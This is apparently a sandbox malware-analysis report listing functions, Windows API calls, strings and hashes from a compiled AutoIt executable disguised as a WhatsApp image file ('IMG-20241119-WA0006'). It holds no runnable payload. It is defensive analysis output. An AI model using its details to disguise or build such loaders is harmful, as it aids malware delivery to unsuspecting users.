Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 438480954-3287110873
Opcode ID: b6979676f2dd096d50a416972999cfb023afb963d994f00e3c7f5206120b4560
Instruction ID: a9ca5a4f6e7bd6aa8d8d7f4dd95b01f55461434011910510bdbfe54db0e95b18
Opcode Fuzzy Hash: b6979676f2dd096d50a416972999cfb023afb963d994f00e3c7f5206120b4560
Instruction Fuzzy Hash: 0751F034A44248BADF11BBF4EC46EEE7BB9BB56B04F004064F681675A3DB744AC58B21

Function 0009DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 0009DDEC
GetCurrentProcess.KERNEL32(00000000,0011DC38,?,?), ref: 0009DEAC
GetNativeSystemInfo.KERNELBASE(?,0011DC38,?,?), ref: 0009DF01
FreeLibrary.KERNEL32(00000000,?,?), ref: 0009DF0C
FreeLibrary.KERNEL32(00000000,?,?), ref: 0009DF1F
GetSystemInfo.KERNEL32(?,0011DC38,?,?), ref: 0009DF29
GetSystemInfo.KERNEL32(?,0011DC38,?,?), ref: 0009DF35

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
String ID:
API String ID: 3851250370-0
Opcode ID: e6ff429fbc7079cbc2976759ef95aa38d0decbe191059c992a093441662d2599
Instruction ID: 0f568be449be72a5072068f69184c918341d0e0f9684b264beb8d63b68ce92d5
Opcode Fuzzy Hash: e6ff429fbc7079cbc2976759ef95aa38d0decbe191059c992a093441662d2599
Instruction Fuzzy Hash: AC61C1B180A384CFCF15DF6898C11ED7FB4AF29300B1989EAD8859F24BC674C949DB65

Function 0008406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0008449E,?,?,00000000,00000001), ref: 0008407B
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0008449E,?,?,00000000,00000001), ref: 00084092
LoadResource.KERNEL32(?,00000000,?,?,0008449E,?,?,00000000,00000001,?,?,?,?,?,?,000841FB), ref: 000F4F1A
SizeofResource.KERNEL32(?,00000000,?,?,0008449E,?,?,00000000,00000001,?,?,?,?,?,?,000841FB), ref: 000F4F2F
LockResource.KERNEL32(0008449E,?,?,0008449E,?,?,00000000,00000001,?,?,?,?,?,?,000841FB,00000000), ref: 000F4F42

Strings

SCRIPT, xrefs: 00084088

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 6f1bd41e807b57067dec9e07a111fd9f22c2dc2232f34f3c97252202605ac1e1
Instruction ID: fc3a8ea084ade17ff139578ca25a4ac0dac90b3aadb8eeae9f363ff824f0af7e
Opcode Fuzzy Hash: 6f1bd41e807b57067dec9e07a111fd9f22c2dc2232f34f3c97252202605ac1e1
Instruction Fuzzy Hash: AC113C71200711BFE7219B65EC48F677BB9EBC5B51F10816CF682966A0DBB1DC408A20

Function 000C6CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,000F2F49), ref: 000C6CB9
FindFirstFileW.KERNELBASE(?,?), ref: 000C6CCA
FindClose.KERNEL32(00000000), ref: 000C6CDA

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 5a7b279228f21a94a9e39e5a095b2978824a8f1a3e92a633c6d7ad411bd01890
Instruction ID: 051fb504af5a60bc8a58de33c7f62eebb342e38dbfd40a8980e0327ceb558082
Opcode Fuzzy Hash: 5a7b279228f21a94a9e39e5a095b2978824a8f1a3e92a633c6d7ad411bd01890
Instruction Fuzzy Hash: 09E09A31810410AB82206778AC498AE36ACEF06339B10075AF8B2C21E0EBB6998086D6

Function 00093200 Relevance: 1.0, Instructions: 986COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: d4aec853267b15222cd70d239253fa70a95769b07b2176e17e243fe956a75130
Instruction ID: 5417cba451acdac917cbcfeb65386204807a9c722a8fc8211aa709d6ae99591c
Opcode Fuzzy Hash: d4aec853267b15222cd70d239253fa70a95769b07b2176e17e243fe956a75130
Instruction Fuzzy Hash: 979258706083419FDB64DF18C484B6AB7E1BF88308F14885DE99A8B3A2D771ED45EF52

Function 0008E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0008E959
timeGetTime.WINMM ref: 0008EBFA
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0008ED2E
TranslateMessage.USER32(?), ref: 0008ED3F
DispatchMessageW.USER32(?), ref: 0008ED4A
LockWindowUpdate.USER32(00000000), ref: 0008ED79
DestroyWindow.USER32 ref: 0008ED85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0008ED9F
Sleep.KERNEL32(0000000A), ref: 000F5270
TranslateMessage.USER32(?), ref: 000F59F7
DispatchMessageW.USER32(?), ref: 000F5A05
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000F5A19

Strings

@TRAY_ID, xrefs: 000F54C9
@GUI_WINHANDLE, xrefs: 000F5360
@GUI_CTRLHANDLE, xrefs: 000F53AC
@GUI_CTRLID, xrefs: 000F5314

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 2641332412-570651680
Opcode ID: b7bc540ada42dde61085338e3b9f3a5ac2ea3604293abf948f502c564e9713d2
Instruction ID: e2c6a0e32831cf63912333ab2e1d83f80755af1c31a4a35ecbba6ff14d412510
Opcode Fuzzy Hash: b7bc540ada42dde61085338e3b9f3a5ac2ea3604293abf948f502c564e9713d2
Instruction Fuzzy Hash: 7D62E470508384DFDB64EF24C885BAA77E4BF45304F04496DFAC68B692DBB1E884DB52

Function 000B5C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 000B5EC3
___createFile.LIBCMT ref: 000B5F04
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 000B5F2D
__dosmaperr.LIBCMT ref: 000B5F34
GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 000B5F47
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 000B5F6A
__dosmaperr.LIBCMT ref: 000B5F73
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 000B5F7C
__set_osfhnd.LIBCMT ref: 000B5FAC
__lseeki64_nolock.LIBCMT ref: 000B6016
__close_nolock.LIBCMT ref: 000B603C
__chsize_nolock.LIBCMT ref: 000B606C
__lseeki64_nolock.LIBCMT ref: 000B607E
__lseeki64_nolock.LIBCMT ref: 000B6176
__lseeki64_nolock.LIBCMT ref: 000B618B
__close_nolock.LIBCMT ref: 000B61EB

Part of subcall function 000AEA9C: CloseHandle.KERNELBASE(00000000,0012EEF4,00000000,?,000B6041,0012EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000AEAEC
Part of subcall function 000AEA9C: GetLastError.KERNEL32(?,000B6041,0012EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000AEAF6
Part of subcall function 000AEA9C: __free_osfhnd.LIBCMT ref: 000AEB03
Part of subcall function 000AEA9C: __dosmaperr.LIBCMT ref: 000AEB25

Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E

__lseeki64_nolock.LIBCMT ref: 000B620D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 000B6342
___createFile.LIBCMT ref: 000B6361
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000B636E
__dosmaperr.LIBCMT ref: 000B6375
__free_osfhnd.LIBCMT ref: 000B6395
__invoke_watson.LIBCMT ref: 000B63C3
__wsopen_helper.LIBCMT ref: 000B63DD

Strings

@, xrefs: 000B5F98

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: @
API String ID: 3896587723-2766056989
Opcode ID: 2b9b7a10fb1ea3fcb6ecff6a0e45c92e99213a5f1c112832a62cc8b01b409936
Instruction ID: d03a8ad8df0568bc52204f7fb6954f113e4c72307c390aae1314925c7fa7f588
Opcode Fuzzy Hash: 2b9b7a10fb1ea3fcb6ecff6a0e45c92e99213a5f1c112832a62cc8b01b409936
Instruction Fuzzy Hash: F32238719046069FEF299FA8DC45BFD7BB1EB05324F284269E5219B2D2C73A8D40C751

Function 000AEE0E Relevance: 26.2, APIs: 17, Instructions: 664COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: 6654b903560e5cbfa1ae6f051ec56aaac6bec17a9b06c15aabb8b209fcb04a23
Instruction ID: 423f36fc6d6ea3dd15d8219ce866717c50868f69d62f46071693909fe449fda1
Opcode Fuzzy Hash: 6654b903560e5cbfa1ae6f051ec56aaac6bec17a9b06c15aabb8b209fcb04a23
Instruction Fuzzy Hash: 2B322575E04242DFDB218FE8D880BBD7BF1AF47314F25416AE9999B293C7709942CB60

Function 000CFA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcscpy.LIBCMT ref: 000CFA96
_wcschr.LIBCMT ref: 000CFAA4
_wcscpy.LIBCMT ref: 000CFABB
_wcscat.LIBCMT ref: 000CFACA
_wcscat.LIBCMT ref: 000CFAE8
_wcscpy.LIBCMT ref: 000CFB09
__wsplitpath.LIBCMT ref: 000CFBE6
_wcscpy.LIBCMT ref: 000CFC0B
_wcscpy.LIBCMT ref: 000CFC1D
_wcscpy.LIBCMT ref: 000CFC32
_wcscat.LIBCMT ref: 000CFC47
_wcscat.LIBCMT ref: 000CFC59
_wcscat.LIBCMT ref: 000CFC6E

Part of subcall function 000CBFA4: _wcscmp.LIBCMT ref: 000CC03E
Part of subcall function 000CBFA4: __wsplitpath.LIBCMT ref: 000CC083
Part of subcall function 000CBFA4: _wcscpy.LIBCMT ref: 000CC096
Part of subcall function 000CBFA4: _wcscat.LIBCMT ref: 000CC0A9
Part of subcall function 000CBFA4: __wsplitpath.LIBCMT ref: 000CC0CE
Part of subcall function 000CBFA4: _wcscat.LIBCMT ref: 000CC0E4
Part of subcall function 000CBFA4: _wcscat.LIBCMT ref: 000CC0F7

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 000CFA61

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 2955681530-2806939583
Opcode ID: 829ad52aa29513bf9f31053816c4a166456312449c3cdb2748b1d381ee16a7ad
Instruction ID: 44a753674bf34f0c164d04a6cfd2749f0c89dd07830eac2a34032ae9dcd218df
Opcode Fuzzy Hash: 829ad52aa29513bf9f31053816c4a166456312449c3cdb2748b1d381ee16a7ad
Instruction Fuzzy Hash: 1D91A072504306AFCB20EB54C851FEEB3E9BF94310F04482DF99997292DB30EA44CB92

Function 00083F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00083F86
RegisterClassExW.USER32(00000030), ref: 00083FB0
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00083FC1
InitCommonControlsEx.COMCTL32(?), ref: 00083FDE
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00083FEE
LoadIconW.USER32(000000A9), ref: 00084004
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00084013

Strings

TaskbarCreated, xrefs: 00083FB6
0, xrefs: 00083F68
+, xrefs: 00083F6F
AutoIt v3 GUI, xrefs: 00083FA2

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 6d87f51828197666054686dfe9e881967e8aaa364f3d5aed0b2736da9037c3fe
Instruction ID: a137891b14474391f7d8662ad17fa92edf1a76e736d93982b145cf607699edc7
Opcode Fuzzy Hash: 6d87f51828197666054686dfe9e881967e8aaa364f3d5aed0b2736da9037c3fe
Instruction Fuzzy Hash: 0C21C7B9900318AFDB00DFE4E889BCDBBB4FB09714F01421AFA55A66A0D7F545C48F91

Function 000CBFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000CBDB4: __time64.LIBCMT ref: 000CBDBE

Part of subcall function 00084517: _fseek.LIBCMT ref: 0008452F

__wsplitpath.LIBCMT ref: 000CC083

Part of subcall function 000A1DFC: __wsplitpath_helper.LIBCMT ref: 000A1E3C

_wcscpy.LIBCMT ref: 000CC096
_wcscat.LIBCMT ref: 000CC0A9
__wsplitpath.LIBCMT ref: 000CC0CE
_wcscat.LIBCMT ref: 000CC0E4
_wcscat.LIBCMT ref: 000CC0F7
_wcscmp.LIBCMT ref: 000CC03E

Part of subcall function 000CC56D: _wcscmp.LIBCMT ref: 000CC65D
Part of subcall function 000CC56D: _wcscmp.LIBCMT ref: 000CC670

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 000CC2A1
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000CC338
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000CC34E
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000CC35F
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 000CC371

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
String ID:
API String ID: 2378138488-0
Opcode ID: 938f647347eb7b1d33aeeb7d29e0f8b32edfc166a1ea99894826cd44c41ab142
Instruction ID: cd893ad3215c7a8b13dd98688de1662eb276c7ccef53c9f06223db6a9ed210a7
Opcode Fuzzy Hash: 938f647347eb7b1d33aeeb7d29e0f8b32edfc166a1ea99894826cd44c41ab142
Instruction Fuzzy Hash: 24C1F9B1900219ABDF21DF95DC81FDEBBB9BF49310F1040AAF609E6152DB719A848F61

Function 00083742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 000837B3
KillTimer.USER32(?,00000001), ref: 000837DD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00083800
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0008380B
CreatePopupMenu.USER32 ref: 0008381F
PostQuitMessage.USER32(00000000), ref: 0008382E

Strings

TaskbarCreated, xrefs: 00083806

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: f90dd9dc314e09304b1e0a3924b3092bbafe57e0defdde30076b6d42f00876b5
Instruction ID: a358bc793d63c1a9a6e210b29bc9b5683619ac526b104b48f8edc6574afef61c
Opcode Fuzzy Hash: f90dd9dc314e09304b1e0a3924b3092bbafe57e0defdde30076b6d42f00876b5
Instruction Fuzzy Hash: C04159F9108259BBDB347F68EC4ABBE3A95F781B01F000125F682925A2DF65DEC09761

Function 00083E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00083E79
LoadCursorW.USER32(00000000,00007F00), ref: 00083E88
LoadIconW.USER32(00000063), ref: 00083E9E
LoadIconW.USER32(000000A4), ref: 00083EB0
LoadIconW.USER32(000000A2), ref: 00083EC2

Part of subcall function 00084024: LoadImageW.USER32(00080000,00000063,00000001,00000010,00000010,00000000), ref: 00084048

RegisterClassExW.USER32(?), ref: 00083F30

Part of subcall function 00083F53: GetSysColorBrush.USER32(0000000F), ref: 00083F86
Part of subcall function 00083F53: RegisterClassExW.USER32(00000030), ref: 00083FB0
Part of subcall function 00083F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00083FC1
Part of subcall function 00083F53: InitCommonControlsEx.COMCTL32(?), ref: 00083FDE
Part of subcall function 00083F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00083FEE
Part of subcall function 00083F53: LoadIconW.USER32(000000A9), ref: 00084004
Part of subcall function 00083F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00084013

Strings

#, xrefs: 00083F09
0, xrefs: 00083F02
AutoIt v3, xrefs: 00083F1F

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: d243e18c8685d8a38ca9e48b860af88a081d4dece025ebb373160a262d6242cb
Instruction ID: 8bd33e138eef2b06106f64114a18c4392f9ad0d202866044d326846b04b9c75a
Opcode Fuzzy Hash: d243e18c8685d8a38ca9e48b860af88a081d4dece025ebb373160a262d6242cb
Instruction Fuzzy Hash: C0212AB8D04314ABCB10DFA9EC49A99BBF5FB49714F00412AE214A76B0D7B546C48F91

Function 00F59D68 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00F59DAD

Memory Dump Source

Source File: 00000000.00000002.1680250145.0000000000F59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F59000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f59000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction ID: 57012f53442dc0a75d696527bc6bba3b25e9423c92e497f62dd9ebcb96d535f6
Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction Fuzzy Hash: D1511B75A54208FBDF24DFA0CC49FDE77B8AF48711F108544FB09EA180DBB49A45AB60

Function 000849FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00084A1D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 000F41DB
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 000F421A
RegCloseKey.ADVAPI32(?), ref: 000F4249

Strings

Software\AutoIt v3\AutoIt, xrefs: 00084A13
Include, xrefs: 000F41D3, 000F4212

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
